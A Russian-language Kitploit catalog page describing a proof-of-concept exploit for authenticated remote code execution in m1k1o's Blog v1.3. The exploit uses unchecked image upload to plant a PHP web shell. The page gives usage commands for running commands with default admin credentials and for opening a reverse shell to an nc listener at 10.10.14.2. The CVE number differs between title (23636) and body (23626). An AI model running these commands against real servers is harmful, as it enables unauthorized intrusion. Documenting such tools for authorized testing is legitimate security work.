Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-23636-poc — Эксплойт для аутентифицированного удаленного выполнения кода для m1k1o's Blog v1.3 через непроверенную загрузку файлов, с развертыванием веб-шелла и возможностью обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/cyhe50/cve-2022-23636-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcyhe50/cve-2022-23636-poc

cve-2022-23636-poc

Эксплойт для аутентифицированного удаленного выполнения кода для m1k1o's Blog v1.3 через непроверенную загрузку файлов, с развертыванием веб-шелла и возможностью обратной оболочки.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-23626 - Аутентифицированное RCE в блоге m1k1o

Аутентифицированное удаленное выполнение кода через уязвимость загрузки файлов в блоге m1k1o версии 1.3 и ниже.

Описание

Конечная точка ajax.php?action=upload_image неправильно проверяет типы загружаемых файлов, позволяя аутентифицированному пользователю загрузить PHP-веб-шелл, замаскированный под изображение. Затем атакующий может запустить исполнение, напрямую запросив загруженный файл.

Ссылки

  • EDB-50943
  • CVE-2022-23626
  • m1k1o/blog GitHub

Подверженные версии

  • Блог m1k1o версии 1.3 и ниже

Требования

  • Python 3
  • библиотека requests
root@kitploit:~
pip install requests

Использование

Выполнить команду

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"

Обратный шелл

Сначала запустите слушатель:

root@kitploit:~
nc -lnvp 4444

Затем выполните:

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Используйте его только на системах, на тестирование которых у вас есть явное разрешение.

Скачать инструмент